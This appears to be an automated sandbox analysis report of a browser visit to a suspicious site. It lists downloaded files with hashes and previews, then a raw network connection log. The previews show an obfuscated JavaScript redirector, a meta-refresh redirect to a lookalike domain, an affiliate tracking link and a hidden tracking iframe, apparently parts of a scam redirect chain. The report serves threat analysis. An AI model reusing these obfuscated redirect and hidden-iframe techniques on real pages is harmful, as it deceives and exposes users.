                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2.."................................................................................!.1.A.Qq.2.3a..."B..Rbr.#CS4.......................1A.!q"3.a............?.e.8...h...s.[7.I.>.,k[...U.Y,ty.b8*.|\..dJ.....".<J..........V~:..=..uk..*...J..6.-.T.0M+.....M....0i..nOG..\..,....vs$.....E.".}*."d...;... .....kS$)B.=.%....s|Yf..w....)^.O$]tb..L.I}.?`.Yi\Y..$.9F...I..-.......y.9..._CE.9.+....*....{R..........)..j...X.5.......*.K.D.h.#......D.X..B..Ds.........]8o.e.....P..+.-y2d|Mm.....L.!......c.KA.u.:......\..Z..#<...@Z.;.(...1.u.!..L.L2........8..W..u...ihc.F..C[W..../R.%...c.k....X.[&I......O3........G..?.J...7.,.x."..%~........=G/..<zw......t.g]u(B...v'....&.}...>.!Ql#.......<...t.W..pB...P..[..!g...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):287
                                                          Entropy (8bit):5.206982582809481
                                                          Encrypted:false
                                                          SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRxn0AQeoFKBFEcXaoD:J0+oxBeRmR9etdzRxGezHDn5+dma+
                                                          MD5:982B8FF10CA7625F1666AA7E331D1E48
                                                          SHA1:A998000324D79CD79BEB74B38F615C081DA8D567
                                                          SHA-256:5044F2DE7592046F8ED01BD9344287A910B1B1AA73BF21658DC4D64652E48135
                                                          SHA-512:239E27E27B837B2728F730D4DA520E222B852BA5B804F88179C4F30F67CF97FC940973B16E63EE975EB2F257AC32209739DC76BFE4CD8E8D2FEC70FC13220B90
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/favicon.ico
                                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.29 (Ubuntu) Server at sofa.thriveuniversehq.com Port 80</address>.</body></html>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                          Category:downloaded
                                                          Size (bytes):22382
                                                          Entropy (8bit):1.7993121781592736
                                                          Encrypted:false
                                                          SSDEEP:48:sSY37LOM5M80I15CEARV/acnFNOpaF/vXE:sSw7LOekI1EE+fPOpaF30
                                                          MD5:891E510219786F543CA998282ED99F45
                                                          SHA1:19FE2FF6A2418BCB44B02308B998CEF84199EE08
                                                          SHA-256:E4BDF72E2F803F7E19907C12F407AC7F7CD5F1F94BFD730B9BE24B0D49191B48
                                                          SHA-512:E6729E7E1ED1909297317E249ADB7AF6C230B2A7082EA792C7776FA5037C8ED8AAF02BCC4015334B6C439732F965CE19291FFE863126D0C20BED9A0C89C4A95B
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.ico
                                                          Preview:............ .h...6... .... .........@@.... .(B..F...(....... ..... ................................................................................................................................................................................X.......J......."...........................................V..............................................................................................X......................................................................................................................................................................................................................................................................................................................]...........................U.......................................4...........................v...........2...t.........................................................H...9...................................................................c..............................
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:dropped
                                                          Size (bytes):1212
                                                          Entropy (8bit):7.487393417354084
                                                          Encrypted:false
                                                          SSDEEP:24:shtyXb8vXDm5UJkSqFSk2A0uESG9ENQXMdoakgqQkQQRV59BHHUGI:shfvTm50kSv9WH1kgsRV5HHHUGI
                                                          MD5:0B91B284D880829BC882F96C1EB2F21C
                                                          SHA1:06DD26BCBDE4B7A8981091D028A5664238CEC671
                                                          SHA-256:2AC98DE861AAE4984B0D4A2EAAF03525B8A230F6645598D7951AD970EB35193A
                                                          SHA-512:5F15C31A043F9AAB7404E161380176246372EA5BFE1D7F02A40D0355D8436A5AA559E4A47AA1FED664CCE3AEC6E84C297566655EE8DF989A2A915A02685B91F5
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2.."................................................................................!1..AQa"2.q.3....Br....RCS4D5.....................!1Q..A.q."2BRr.3.............?.W.....4.....20.g....CDN.1.Q[.N.o.Tp.G.# =..s..+......G\OJ.y[.}.~4.1.......6..#.....s..l/.4....,.hK..p..?..6W/..OTL.v.!..1..^Lw\..s..V.3,.. 9.k....3......R...m..dc.n8.G_..c.Xr.K|..B.H.5..v...Y..S..?.G~.........s.^E{..-....3..5ee.YJ.kV...Z..g\(.....o...EO.........pe....#.e.c..y.w%..V'..t.i|......+.&.U!.A........R.r..0.Jq..A.9R.............*.`........Z..^J..%V,.s.....5s..%...F...|.!. @....1..[.Z?.n.6.S..+.....G..=z"......U...2.)#.*.$....ku..)(..k..Q..U&.Q /.x.<....ta.y.#.c.....b..b*2-U.)......~'...U..l..........jc.8.C..B...J..;3.SN*..<1..S]\}.M0W.B.t..1.\{..D..p..og.a.........W....2..N=...I#x=$P.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (1180), with CRLF, LF line terminators
                                                          Category:downloaded
                                                          Size (bytes):1233
                                                          Entropy (8bit):5.554754890514694
                                                          Encrypted:false
                                                          SSDEEP:24:u329/UghngWvEQRjhzHtinjuNENK0v1FRNm3d2NqD10V57BpRsHauEcr7MOoW:u3oUghnrEQRjRNijMENK4bjm3d2u10V4
                                                          MD5:B992FD95F789622FF7303C8F5C72A966
                                                          SHA1:F2346813E5937EF81F2142AA853FF5523683BCBA
                                                          SHA-256:EB31503891973182467742BD11BE208B02B07B19D0CE9B1216A35CC6E7BE78DB
                                                          SHA-512:FE0BF700760F27B60DEA8927D9D9E7CA2374A767621C612BE5D9DEC058DB40F9E0F647B6187F4E0EFF4E0EA85179078D2AC25DC5508480612C490AF4BDE2B384
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php
                                                          Preview:.<script>...var _0x45a3=['href','310326TemamY','$1//$2','3789jqLAjI','201260CufYBR','includes','location','624856ogdMrz','28pRWhXX','10734yvtFqz','352RuMMpQ','1339PvpRAh','392868PctkdY','indexOf','596BmZxvY'];var _0x5ce7=function(_0x34bb17,_0x37718d){_0x34bb17=_0x34bb17-0x1b8;var _0x45a37a=_0x45a3[_0x34bb17];return _0x45a37a;};var _0x3c82e1=_0x5ce7;(function(_0x4279be,_0x4a014c){var _0x2ec4e6=_0x5ce7;while(!![]){try{var _0xe2f92d=-parseInt(_0x2ec4e6(0x1c4))+parseInt(_0x2ec4e6(0x1c2))*-parseInt(_0x2ec4e6(0x1bf))+-parseInt(_0x2ec4e6(0x1c0))+parseInt(_0x2ec4e6(0x1bc))*parseInt(_0x2ec4e6(0x1bd))+parseInt(_0x2ec4e6(0x1bb))+-parseInt(_0x2ec4e6(0x1b8))+parseInt(_0x2ec4e6(0x1c6))*parseInt(_0x2ec4e6(0x1be));if(_0xe2f92d===_0x4a014c)break;else _0x4279be['push'](_0x4279be['shift']());}catch(_0x1227cb){_0x4279be['push'](_0x4279be['shift']());}}}(_0x45a3,0x87e5e));var params='';params!=''&&(window[_0x3c82e1(0x1ba)][_0x3c82e1(0x1c3)][_0x3c82e1(0x1c1)]('?')<0x0?params='?'+params:params='&'+params);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):131
                                                          Entropy (8bit):4.766002377767103
                                                          Encrypted:false
                                                          SSDEEP:3:nmNjJMzVGKLRAC1zWNVYrSLFKJlr0KW2Ky2:GMRdlVCNOGLFuVz8
                                                          MD5:34CDB2D882F4CCC4089CBB65CEB20697
                                                          SHA1:DD3CD78A7B2A683FD3A79142B932007FC10415C0
                                                          SHA-256:02A77255703091CC9A9052E7677997E56D457C29C561CC118D671E26C436F07F
                                                          SHA-512:D114BB2E41B59B54F974C4323A53EDEE7E65E977DEE5462488E915384E2381AE86F8B0D6AB5DDE1B62D1F5562AAFAF660E91DBA4D85BFF8EBFD78BB1BA4CDCC3
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html
                                                          Preview:<meta http-equiv="refresh"content="0; url=https://www.govwlfeloony.com/2FRNJG5BQ/GZHBQPR/........................................">
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):36030
                                                          Entropy (8bit):7.978346560181183
                                                          Encrypted:false
                                                          SSDEEP:768:X7KjW6udNmJBlGpUaUkroF1XPAwjndfL/a0Vwp7XtY:XR6udNmJBcUa9oF1/ASLaphY
                                                          MD5:4BFBE9233B14CD02086784EF89626DD8
                                                          SHA1:08C63AE98AA480B86FDE64A6536E824748A5B8E3
                                                          SHA-256:D7FD50F440F4F0377D9B4B7CA539BABC1D776259B55B6D295E498247A2265C34
                                                          SHA-512:9C1DEA2813EAA8E5586CA6A70CDA53BADD2C982AFE91BB648579F5BAECB149DAB852C74431C031AA08CFCE64A6A9297075F34A44DC7A817C00942701001E2689
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/utils/banners/images/2023-months/2023-11.png?v=1
                                                          Preview:.PNG........IHDR...,...,.....y}.u....sRGB...,.....pHYs................cIDATx...........8..c.D.8DD.........e.z..."..(...q..8.y...5...1..(....q.......[{.]..T.....Z.SO7M..:..Zk.w....Z..."..d.9..c....p........ZO.=..g.h....^[w]..^.....c..n}....k..\...6.........}..'..#.R.L..XD...`......z}b.....5....\..u..Gt..[E..Y?9...q.....V.U.?../.Rt.Z=NZt.+.<PY....YL.mi.R....=..........2....+s}.v.../.~..?.....mk..9_.......k[].E......E..c....=..'.C.j.<..XH......R.A......P{....6.kPtC.........Ue.y.....2......z...D4c......\_..\[......c.........h....#.V...'fq...,....f....n.~dt...mC.D.....:h...m..p.^..$.2..km.+{..F.V.A.8q-......;..9...a...q.7....^.*.]..A.. ..K...F.Oj..A.J...R.<./.....6;.0....w....gt...m.]........_..n...]\f..y......-..........&#...0B....[..;.E.7_~.=v...];..n.:&.a....\W...o.H_.E......Q.......t4.....6.O|..f.$c.u....;.....gt.nS.'..}...G......>.t...F..{ht...hd.d\.....JII.fAk.......+s=.K.P.....v...q.]Q....'..k.........{Mm..H].E.r...K-wL.X-R..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (1521), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):14179
                                                          Entropy (8bit):5.388925743061551
                                                          Encrypted:false
                                                          SSDEEP:384:GuB/liFsceUiVBRtjqGaKWvX/ryfkeE8goOC1DDuBBygtbeoWyGzTXdQ:GOliF7ebkejgTCDuBByg9eSD
                                                          MD5:EFE3EFA3F0AD7B478FC0F73B3138323D
                                                          SHA1:9DCB193E148E5A09523DBE548B7462D6473E62DC
                                                          SHA-256:36B9129C8878CD647C68015330C72D86E6103D3FBB554D5D64953AD68C55A361
                                                          SHA-512:EDE3B688363FECC722E833A5BBFDF183C23D664DFA97B382BF11D200A978CD4B8A1FAD2036160D2D4269026B63039B3666F9918D174D8B852832DD1148D92003
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/js/scripts-w14-t-f-qc-v2-fst-ri.js?v=5.40&cc=us
                                                          Preview:var x = new Date();..var x1 = x;..function findGetParameter(parameterName) {.. var result = null,.. tmp = [];.. var items = location.search.substr(1).split("&");.. for (var index = 0; index < items.length; index++) {.. tmp = items[index].split("=");.. if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);.. }.. return result;..}....function trkclk() {...var iframe = document.createElement('iframe');...iframe.src = "https://" + oho + "/click/1";...iframe.height = 0;...iframe.width = 0;...iframe.style.visibility = 'hidden';...iframe.style.display = 'none';...document.body.appendChild(iframe);..}....function loadWall () {...var countDownDateAjax;...var endDateAjax = Array(); ...var currentTimeAjax;......trkclk();......if (typeof gtag != 'undefined') {....var script_tag = document.createElement('script');....script_tag.type = 'text/javascript';....script_tag.text = gtag;....document.head.appendChild(script_tag);...}......$('#offer-modal').mod
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (1238)
                                                          Category:downloaded
                                                          Size (bytes):1239
                                                          Entropy (8bit):5.068464054671174
                                                          Encrypted:false
                                                          SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                          MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                          SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                          SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                          SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                          Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4834
                                                          Category:downloaded
                                                          Size (bytes):1722
                                                          Entropy (8bit):7.878764936790969
                                                          Encrypted:false
                                                          SSDEEP:48:XSEnN1mSQKutMOqbKunBDjjT9zznirZ6qc2:CEnN1VQHtXqBDlz32
                                                          MD5:B758612C53E144A1C1AEF3759C3B34C0
                                                          SHA1:E0D43E78EEAADBDB95A18F4F6798E8705F792D03
                                                          SHA-256:E1C94B0FD61C6306DF18FE935A7B77FB390AA4A5D9669F374F994E0CFC903C6A
                                                          SHA-512:7822A33E90DF749A1BA03F0A2A15E5CF998924292592AB40EBB62CD10A7123BBFED1ECD2517FF7E123E155435E2D05C9F0241BD3B4E3661BE3294555280ECB20
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=
                                                          Preview:...........X[..6.~._.<.,bX],K...Bi..S......m..f.`;..m.{G.-..0.8..U.|:..w......;'3%..[..|...<yp..>.E..}.....Rz..w..2o..h..8..-U8g..;4.........R.}.`\.fS9.S...h%...-..L..#..*n.S.+^&....{.,W..os8.:.C....x......2\dL%S......%..L.....j..M.|..z...\..|.Y.../U.|...R.7...........0.".XU....3.....z.....B].s...XU..%....^..i..*...ju.t&...B..\..F.Vj...~..._..W..[r..C-....S.F..|.|.x..<. W....b.|........7..x.y........7...>X.r....Bi ......Z.B-.5.6...... 8....hg.............u.B..I...o...\.e...Q.*x....+..!.....!aT...0c.`..,d...Ae.EQ..m..0.9.....\/Y .0... ..,...R..ij`!I....pfGJ$x.|.`|5./.w..4..M..s)P..<y..U.^,.....VH....?...4t.'....Co...rp@:...M.l.`>v.4...v.k...y..Y.:.P.......L.n9...IL..w..|p.......V.x^z}...GgV).w.....3..M=....S..e.R..xg.)..`..B.U.......mE.(.0..Y.d..a.-g..#..f....G.5........D.:.1T......YY.......P.9...Z..R....q..<}.y..(..Tx..4.O&...y.._.Ir.T.....ai[.:9{v>...,t....5.}M.4.f.."9u.C..u..%#Jp..v%.c...T)\0^...:DKA%.Kj.....e.R...T.*Up.kYQ
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (32047)
                                                          Category:downloaded
                                                          Size (bytes):95931
                                                          Entropy (8bit):5.394232486761965
                                                          Encrypted:false
                                                          SSDEEP:1536:5P1vk7i6GUHdXXeyQazBu+4HhiO2AEeLNFoqqhJ7SerN5sVI6xcBgPv7E+nzms9d:A4Ud4qhJvNPqcB47MfWWca98HrB
                                                          MD5:5790EAD7AD3BA27397AEDFA3D263B867
                                                          SHA1:8130544C215FE5D1EC081D83461BF4A711E74882
                                                          SHA-256:2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0
                                                          SHA-512:781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js
                                                          Preview:/*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                          No static file info
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 27, 2023 04:23:36.530333996 CET49675443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:36.530337095 CET49674443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:36.624075890 CET49673443192.168.2.523.1.237.91
                                                          Nov 27, 2023 04:23:39.851654053 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:39.851677895 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:39.851763964 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:39.852087975 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:39.852102995 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:39.852698088 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:39.852729082 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:39.852782011 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:39.853025913 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:39.853034019 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.068200111 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.068259954 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.068540096 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.068552017 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.068646908 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.068660021 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.069011927 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.069072962 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.069822073 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.069829941 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.069891930 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.069895983 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.070866108 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.070924044 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.071057081 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.071104050 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.071135044 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.071142912 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.071254015 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.071259022 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.124360085 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.158930063 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.256592989 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.256777048 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.256829023 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.257091045 CET49705443192.168.2.5142.251.179.100
                                                          Nov 27, 2023 04:23:40.257098913 CET44349705142.251.179.100192.168.2.5
                                                          Nov 27, 2023 04:23:40.278588057 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.278714895 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:40.278775930 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.289316893 CET49706443192.168.2.5172.253.63.84
                                                          Nov 27, 2023 04:23:40.289329052 CET44349706172.253.63.84192.168.2.5
                                                          Nov 27, 2023 04:23:41.764065027 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:41.764102936 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:41.764170885 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:41.764656067 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:41.764693975 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:41.764765978 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:41.767679930 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:41.767695904 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:41.768480062 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:41.768497944 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:41.848948956 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:41.849009037 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:41.849083900 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:41.852751970 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:41.852812052 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.050832033 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.051136017 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.051171064 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.052228928 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.052314997 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.053402901 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.053457022 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.053760052 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.053766966 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.103458881 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.246830940 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.246962070 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.247024059 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.248862028 CET49714443192.168.2.5142.251.167.104
                                                          Nov 27, 2023 04:23:42.248879910 CET44349714142.251.167.104192.168.2.5
                                                          Nov 27, 2023 04:23:42.259198904 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.259438992 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.259454012 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.260510921 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.260571957 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.261558056 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.262136936 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.262152910 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.262300968 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.262362957 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.262480974 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.262486935 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.263252974 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.263318062 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.264381886 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.264448881 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.311450005 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.311458111 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.311486006 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.352826118 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.383807898 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.383851051 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.383920908 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.384409904 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.384423018 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.575544119 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.575850010 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.575879097 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.576941967 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.577034950 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.578790903 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.578867912 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.578998089 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.579004049 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.623905897 CET49716443192.168.2.5142.251.163.105
                                                          Nov 27, 2023 04:23:42.766479015 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.766555071 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.766618967 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.767663956 CET49712443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:23:42.767679930 CET4434971238.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:23:42.775271893 CET44349716142.251.163.105192.168.2.5
                                                          Nov 27, 2023 04:23:42.775376081 CET44349716142.251.163.105192.168.2.5
